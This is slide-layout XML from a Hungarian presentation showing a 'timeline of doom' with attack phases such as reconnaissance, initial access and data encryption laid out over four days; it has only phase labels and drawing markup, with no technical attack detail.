      <p:bldP spid="293" grpId="1" animBg="1"/>
      <p:bldP spid="293" grpId="2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51FE0-ED2C-C9F5-C955-872A49708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18F1AB9-441B-F718-7B90-F5FBA4D069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300" y="318451"/>
            <a:ext cx="16535400" cy="1431256"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="hu-HU" dirty="0" smtClean="0"/>
              <a:t>A végzet idővonala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527757B-26DD-F7F7-4231-AA4F9E29EEF3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="1338870" y="6476999"/>
            <a:ext cx="16072830" cy="266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52EE6576-BCB2-EFC1-F8E9-71C02C2A94E6}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="17292582" y="6357881"/>
            <a:ext cx="238237" cy="238237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1A218B6D-5E7B-0785-696D-08ACB5420220}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1219753" y="6357880"/>
            <a:ext cx="238237" cy="238237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6BABB1F-1641-397E-1505-A76E0774A67D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="85610" y="6596117"/>
            <a:ext cx="2506523" cy="338554"/>
            <a:chOff x="190403" y="4233930"/>
            <a:chExt cx="2506523" cy="338554"/>
          </a:xfrm>
        </p:grpSpPr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C77AA11C-D864-657B-EAF0-5D63A5E8896C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="70" idx="0"/>
              <a:endCxn id="5" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1443665" y="4233930"/>
              <a:ext cx="0" cy="50800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9781F8B-5E59-2875-E23D-0C0E2204D8B2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="190403" y="4233930"/>
              <a:ext cx="2506523" cy="3385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1600" dirty="0" smtClean="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                </a:rPr>
                <a:t>Kezdet</a:t>
              </a:r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F8646677-56A1-0719-0F9B-55B21375336B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1338870" y="5280807"/>
            <a:ext cx="16072830" cy="1199855"/>
            <a:chOff x="1338870" y="4147713"/>
            <a:chExt cx="16072830" cy="2332949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80D025E1-44F9-D252-61F9-F45FC13AEC99}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1338870" y="4150094"/>
              <a:ext cx="4076934" cy="2330568"/>
              <a:chOff x="2026444" y="3572551"/>
              <a:chExt cx="2597414" cy="2330568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4BF206E3-0CE3-368D-6BAA-4C84DCB23BC4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="2026444" y="3572551"/>
                <a:ext cx="2552227" cy="2330568"/>
                <a:chOff x="39904" y="2897813"/>
                <a:chExt cx="2552227" cy="2330568"/>
              </a:xfrm>
            </p:grpSpPr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6AC83E6B-3BD9-4915-D984-3BA596925747}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvCxnSpPr>
                  <a:cxnSpLocks/>
                  <a:stCxn id="20" idx="2"/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm flipH="1">
                  <a:off x="39904" y="3825378"/>
                  <a:ext cx="1298966" cy="1403003"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:ln w="25400" cap="rnd">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:alpha val="37325"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="sysDot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430A52CE-4394-7615-B63A-824986A0382A}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="85608" y="2897813"/>
                  <a:ext cx="2506523" cy="927565"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom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hu-HU" sz="2500" dirty="0" smtClean="0">
                      <a:solidFill>
                        <a:schemeClr val="bg1"/>
                      </a:solidFill>
                      <a:latin typeface="+mj-lt"/>
                    </a:rPr>
                    <a:t>Első nap</a:t>
                  </a:r>
                  <a:endParaRPr lang="en-US" sz="25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cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="93" name="Straight Arrow Connector 92">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{696415D6-213F-A41B-D93B-CBAA6F8EB690}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="20" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3325410" y="4500116"/>
                <a:ext cx="1298448" cy="1399031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CC9E86A3-EFA7-E8C0-DB4B-A144D7B237B8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5336825" y="4150094"/>
              <a:ext cx="4076934" cy="2330568"/>
              <a:chOff x="2026444" y="3572551"/>
              <a:chExt cx="2597414" cy="2330568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5DF38CC4-2CD0-CB3C-F41F-11FBAB477E1E}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="2026444" y="3572551"/>
                <a:ext cx="2552227" cy="2330568"/>
                <a:chOff x="39904" y="2897813"/>
                <a:chExt cx="2552227" cy="2330568"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="103" name="Straight Arrow Connector 102">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D2D95EC3-E9C8-09BF-4335-3BCAD3D478D2}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvCxnSpPr>
                  <a:cxnSpLocks/>
                  <a:stCxn id="104" idx="2"/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm flipH="1">
                  <a:off x="39904" y="3825378"/>
                  <a:ext cx="1298966" cy="1403003"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:ln w="25400" cap="rnd">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:alpha val="37325"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="sysDot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1D7E90B3-9E1D-7494-EE83-ABD35FA5C805}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="85608" y="2897813"/>
                  <a:ext cx="2506523" cy="927565"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom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hu-HU" sz="2500" dirty="0" smtClean="0">
                      <a:solidFill>
                        <a:schemeClr val="bg1"/>
                      </a:solidFill>
                      <a:latin typeface="+mj-lt"/>
                    </a:rPr>
                    <a:t>Második nap</a:t>
                  </a:r>
                  <a:endParaRPr lang="en-US" sz="25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cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="102" name="Straight Arrow Connector 101">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{105BA215-93E1-0ABA-03EC-AF57C0AE8942}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="104" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3325410" y="4500116"/>
                <a:ext cx="1298448" cy="1399031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5ABD490E-AA48-A02D-B465-93516EBAC54C}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="9335593" y="4147713"/>
              <a:ext cx="4076934" cy="2330568"/>
              <a:chOff x="2026444" y="3572551"/>
              <a:chExt cx="2597414" cy="2330568"/>
            </a:xfrm>
          </p:grpSpPr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CFFCA35-49E6-C257-9C6B-A3B369DD81AE}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="2026444" y="3572551"/>
                <a:ext cx="2552227" cy="2330568"/>
                <a:chOff x="39904" y="2897813"/>
                <a:chExt cx="2552227" cy="2330568"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="110" name="Straight Arrow Connector 109">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{24CCB96D-BC7C-74F5-AFD5-A84824B9E9DE}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvCxnSpPr>
                  <a:cxnSpLocks/>
                  <a:stCxn id="111" idx="2"/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm flipH="1">
                  <a:off x="39904" y="3825378"/>
                  <a:ext cx="1298966" cy="1403003"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:ln w="25400" cap="rnd">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:alpha val="37325"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="sysDot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EB17CDB1-0B9A-BD19-B975-98FD1C74A5F0}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="85608" y="2897813"/>
                  <a:ext cx="2506523" cy="927565"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom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hu-HU" sz="2500" dirty="0" smtClean="0">
                      <a:solidFill>
                        <a:schemeClr val="bg1"/>
                      </a:solidFill>
                      <a:latin typeface="+mj-lt"/>
                    </a:rPr>
                    <a:t>Harmadik nap</a:t>
                  </a:r>
                  <a:endParaRPr lang="en-US" sz="25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cxnSp>
            <p:nvCxnSpPr>
              <p:cNvPr id="109" name="Straight Arrow Connector 108">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9CB1368C-2419-8759-8487-B837A6D76E3C}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="111" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3325410" y="4500116"/>
                <a:ext cx="1298448" cy="1399031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38D151A4-A0B6-3B1D-D8CC-A5D099CA59F0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="13334766" y="4147713"/>
              <a:ext cx="4076934" cy="2330568"/>
              <a:chOff x="2026444" y="3572551"/>
              <a:chExt cx="2597414" cy="2330568"/>
            </a:xfrm>
          </p:grpSpPr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E9912B4F-A5BF-F030-8053-9C696EF5335D}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvGrpSpPr/>
              <p:nvPr/>
            </p:nvGrpSpPr>
            <p:grpSpPr>
              <a:xfrm>
                <a:off x="2026444" y="3572551"/>
                <a:ext cx="2552227" cy="2330568"/>
                <a:chOff x="39904" y="2897813"/>
                <a:chExt cx="2552227" cy="2330568"/>
              </a:xfrm>
            </p:grpSpPr>
            <p:cxnSp>
              <p:nvCxnSpPr>
                <p:cNvPr id="115" name="Straight Arrow Connector 114">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C4439F1C-1F42-1CD9-5729-3969104B9440}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvCxnSpPr>
                  <a:cxnSpLocks/>
                  <a:stCxn id="116" idx="2"/>
                </p:cNvCxnSpPr>
                <p:nvPr/>
              </p:nvCxnSpPr>
              <p:spPr>
                <a:xfrm flipH="1">
                  <a:off x="39904" y="3825378"/>
                  <a:ext cx="1298966" cy="1403003"/>
                </a:xfrm>
                <a:prstGeom prst="straightConnector1">
                  <a:avLst/>
                </a:prstGeom>
                <a:ln w="25400" cap="rnd">
                  <a:solidFill>
                    <a:schemeClr val="bg1">
                      <a:alpha val="37325"/>
                    </a:schemeClr>
                  </a:solidFill>
                  <a:prstDash val="sysDot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B7B6A9C0-3E12-F233-CF43-A5F2EE4BF28C}"/>
                    </a:ext>
                  </a:extLst>
                </p:cNvPr>
                <p:cNvSpPr txBox="1"/>
                <p:nvPr/>
              </p:nvSpPr>
              <p:spPr>
                <a:xfrm>
                  <a:off x="85608" y="2897813"/>
                  <a:ext cx="2506523" cy="927565"/>
                </a:xfrm>
                <a:prstGeom prst="rect">
                  <a:avLst/>
                </a:prstGeom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hu-HU" sz="2500" dirty="0" smtClean="0">
                      <a:solidFill>
                        <a:schemeClr val="bg1"/>
                      </a:solidFill>
                      <a:latin typeface="+mj-lt"/>
                    </a:rPr>
                    <a:t>Negyedik nap</a:t>
                  </a:r>
                  <a:endParaRPr lang="en-US" sz="25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3280D0BE-9715-E832-6D8D-3ABA74F39CF9}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="116" idx="2"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="3325410" y="4500116"/>
                <a:ext cx="1298448" cy="1399031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A034EDDE-EC43-582D-12B4-04B4971E9F2D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="11180607" y="3996076"/>
            <a:ext cx="6572923" cy="2600041"/>
            <a:chOff x="11180607" y="3996076"/>
            <a:chExt cx="6572923" cy="2600041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0E7C9CD2-B664-4BD9-7FAE-0E1AB7C04110}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="11180607" y="3996076"/>
              <a:ext cx="6572923" cy="2600041"/>
              <a:chOff x="-1947594" y="2662576"/>
              <a:chExt cx="6572923" cy="2600041"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="133" name="Flowchart: Connector 132">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{05DBAFBC-826B-5AB9-F3BE-B24967702A7F}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1219753" y="5024380"/>
                <a:ext cx="238237" cy="238237"/>
              </a:xfrm>
              <a:prstGeom prst="flowChartConnector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4" name="Straight Arrow Connector 133">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2FBC7F6F-77A9-6471-98B2-AF33BD720871}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="135" idx="2"/>
                <a:endCxn id="133" idx="0"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1338868" y="4047571"/>
                <a:ext cx="4" cy="976809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B0013E34-C54D-D29F-7795-E827EA3F11C3}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-1947594" y="2662576"/>
                <a:ext cx="6572923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bg1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-lt"/>
                  </a:rPr>
                  <a:t/>
                </a:r>
                <a:br>
                  <a:rPr lang="en-US" sz="2800" dirty="0">
                    <a:solidFill>
                      <a:schemeClr val="bg1"/>
                    </a:solidFill>
                    <a:latin typeface="+mj-lt"/>
                  </a:rPr>
                </a:br>
                <a:endParaRPr lang="en-US" sz="2800" dirty="0">
                  <a:solidFill>
                    <a:schemeClr val="bg1"/>
                  </a:solidFill>
                  <a:latin typeface="+mj-lt"/>
                </a:endParaRPr>
              </a:p>
              <a:p>
                <a:pPr algn="ctr"/>
                <a:endParaRPr lang="en-US" sz="28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pic>
          <p:nvPicPr>
            <p:cNvPr id="132" name="Picture 131" descr="A letter f in orange letters&#10;&#10;AI-generated content may be incorrect.">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F21F5B35-5F76-7805-D44F-CF09F68088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64226" y="4114323"/>
              <a:ext cx="6405683" cy="1170694"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
        </p:pic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CCC4DAD9-E22C-72B6-7261-7D9C6558A6A5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="12981125" y="6349734"/>
            <a:ext cx="2953547" cy="1945383"/>
            <a:chOff x="-137903" y="4186641"/>
            <a:chExt cx="2953547" cy="1945383"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="137" name="Flowchart: Connector 136">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DFBBCD46-0558-B267-A557-90E1899823BC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568A4315-6A94-E4AE-4AD4-764941F6F026}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="139" idx="0"/>
              <a:endCxn id="137" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="1338871" y="4424878"/>
              <a:ext cx="1" cy="1230092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B075C35F-F049-2B9D-76E3-95E4EB44D5E4}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-137903" y="5654970"/>
              <a:ext cx="2953547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rPr>
                <a:t>Adatok titkosítása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9E98F731-E53C-FA71-C6BD-41163AA6BA61}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="1227559" y="6357880"/>
            <a:ext cx="2856071" cy="1107183"/>
            <a:chOff x="-85258" y="4186641"/>
            <a:chExt cx="2856071" cy="1107183"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="141" name="Flowchart: Connector 140">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{188AFD64-B5EB-5420-FED6-F6153A9DE78D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42" name="Straight Arrow Connector 141">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{FBFBD30F-2BA8-2405-1811-6C5AD9D44911}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="143" idx="0"/>
              <a:endCxn id="141" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipH="1" flipV="1">
              <a:off x="1338872" y="4424878"/>
              <a:ext cx="3906" cy="391892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8FE3AFE2-55AA-8AC7-51F7-FE10B0D3D088}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="-85258" y="4816770"/>
              <a:ext cx="2856071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rPr>
                <a:t>Kezdeti hozzáférés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99C2E70-1966-0184-C569-7A614067B9CF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2355910" y="6357880"/>
            <a:ext cx="3975711" cy="1748929"/>
            <a:chOff x="2355910" y="6357880"/>
            <a:chExt cx="3975711" cy="1748929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68A6E5DD-9407-1D3F-E3BB-9C9525C93AC8}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="2355910" y="6357880"/>
              <a:ext cx="3975711" cy="1748929"/>
              <a:chOff x="-2517721" y="4186641"/>
              <a:chExt cx="3975711" cy="1748929"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="44" name="Flowchart: Connector 43">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C46F38CD-8634-F623-7430-1CB62ECF79F5}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1219753" y="4186641"/>
                <a:ext cx="238237" cy="238237"/>
              </a:xfrm>
              <a:prstGeom prst="flowChartConnector">
                <a:avLst/>
              </a:prstGeom>
              <a:gradFill flip="none" rotWithShape="1">
                <a:gsLst>
                  <a:gs pos="100000">
                    <a:srgbClr val="C00000"/>
                  </a:gs>
                  <a:gs pos="57000">
                    <a:srgbClr val="FFB521"/>
                  </a:gs>
                  <a:gs pos="20000">
                    <a:srgbClr val="EA6D09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97A2EA90-373D-1258-325A-8BAE035D0AA4}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvCxnSpPr>
                <a:cxnSpLocks/>
                <a:stCxn id="46" idx="0"/>
                <a:endCxn id="44" idx="4"/>
              </p:cNvCxnSpPr>
              <p:nvPr/>
            </p:nvCxnSpPr>
            <p:spPr>
              <a:xfrm flipV="1">
                <a:off x="-1040947" y="4424878"/>
                <a:ext cx="2379819" cy="1033638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992305F-85C6-114A-A14A-B2E3BE791B33}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr txBox="1"/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="-2517721" y="5458516"/>
                <a:ext cx="2953547" cy="477054"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom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hu-HU" sz="2500" dirty="0" smtClean="0">
                    <a:gradFill>
                      <a:gsLst>
                        <a:gs pos="100000">
                          <a:srgbClr val="C00000"/>
                        </a:gs>
                        <a:gs pos="57000">
                          <a:srgbClr val="FFB521"/>
                        </a:gs>
                        <a:gs pos="20000">
                          <a:srgbClr val="EA6D09"/>
                        </a:gs>
                      </a:gsLst>
                      <a:path path="circle">
                        <a:fillToRect l="100000" t="100000"/>
                      </a:path>
                    </a:gradFill>
                  </a:rPr>
                  <a:t>Felderítés</a:t>
                </a:r>
                <a:endParaRPr lang="en-US" sz="2500" dirty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endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="42" name="Flowchart: Connector 41">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3FF391FA-2B26-B63C-7356-D2BA245AF6B6}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="4079119" y="6357880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9E5A4B0C-9DB4-107A-F538-24E4EC57D726}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvCxnSpPr>
              <a:cxnSpLocks/>
              <a:stCxn id="46" idx="0"/>
              <a:endCxn id="42" idx="4"/>
            </p:cNvCxnSpPr>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm flipV="1">
              <a:off x="3832684" y="6596117"/>
              <a:ext cx="365554" cy="1033638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7512341-403B-E205-FEE2-3E253AAF8382}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="4454097" y="6351793"/>
            <a:ext cx="3827890" cy="2301990"/>
            <a:chOff x="4454097" y="6351793"/>
            <a:chExt cx="3827890" cy="2301990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6F20227-8879-05C2-981F-07B214A18A04}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="5425916" y="6357880"/>
              <a:ext cx="2856071" cy="2295903"/>
              <a:chOff x="-1166808" y="4186641"/>
              <a:chExt cx="2856071" cy="2295903"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="51" name="Flowchart: Connector 50">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B5B8707C-CC7E-1ACE-2C7E-7352B865F85A}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="48178" y="4186641"/>
                <a:ext cx="238237" cy="238237"/>
              </a:xfrm>
              <a:prstGeom prst="flowChartConnector">
                <a:avLst/>
              </a:prstGeom>
              <a:gradFill flip="none" rotWithShape="1">
